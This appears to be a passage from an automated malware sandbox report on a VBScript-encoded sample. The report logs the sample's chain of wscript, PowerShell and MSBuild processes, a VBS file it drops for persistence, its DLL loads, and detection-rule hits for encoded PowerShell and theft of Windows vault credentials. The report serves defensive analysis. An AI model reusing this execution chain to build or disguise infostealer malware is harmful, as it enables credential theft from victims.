                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF4AA015_2_02DF4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFAA3215_2_02DFAA32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFDBE015_2_02DFDBE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF3E8815_2_02DF3E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF41D015_2_02DF41D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFE4D515_2_02DFE4D5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069545C015_2_069545C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06955D5015_2_06955D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695356015_2_06953560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695E0D915_2_0695E0D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695101815_2_06951018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069591F815_2_069591F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695A15015_2_0695A150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695567015_2_06955670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06953CAB15_2_06953CAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069502F815_2_069502F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695C37015_2_0695C370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAA19815_2_06AAA198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFDF8815_2_02DFDF88
                  Source: amsi64_7836.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: wscript.exe, 00000007.00000002.1318391490.000001DF6EF5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1317570324.000001DF6EF5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1317355566.000001DF6EF56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: not find script file "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs".S;.VBP
                  Source: wscript.exe, 00000007.00000003.1315982443.000001DF6EF56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Can not find script file "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs".S;.VBP
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBE@10/12@2/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pczw0rl0.ttj.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF0C53 push ebx; retf 15_2_02DF0C52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF0C45 push ebx; retf 15_2_02DF0C52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF0C6D push edi; retf 15_2_02DF0C7A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695FD38 pushfd ; iretd 15_2_0695FD39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA818B push ss; iretd 15_2_06AA8192
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA8188 push ss; iretd 15_2_06AA818A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA81F8 push ss; iretd 15_2_06AA81FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAE980 push eax; iretd 15_2_06AAE98A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAE903 push eax; iretd 15_2_06AAE90A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAE900 push eax; iretd 15_2_06AAE902
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA7E59 push cs; iretd 15_2_06AA7E5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAFFA3 push ebx; iretd 15_2_06AAFFA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA7DB9 push cs; iretd 15_2_06AA7DBA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AA7D89 push cs; iretd 15_2_06AA7D8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAFAF0 push es; ret 15_2_06AAFAF4

                  Persistence and Installation Behavior

                  barindex
                  Windows Shell Script Host drops VBS files
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
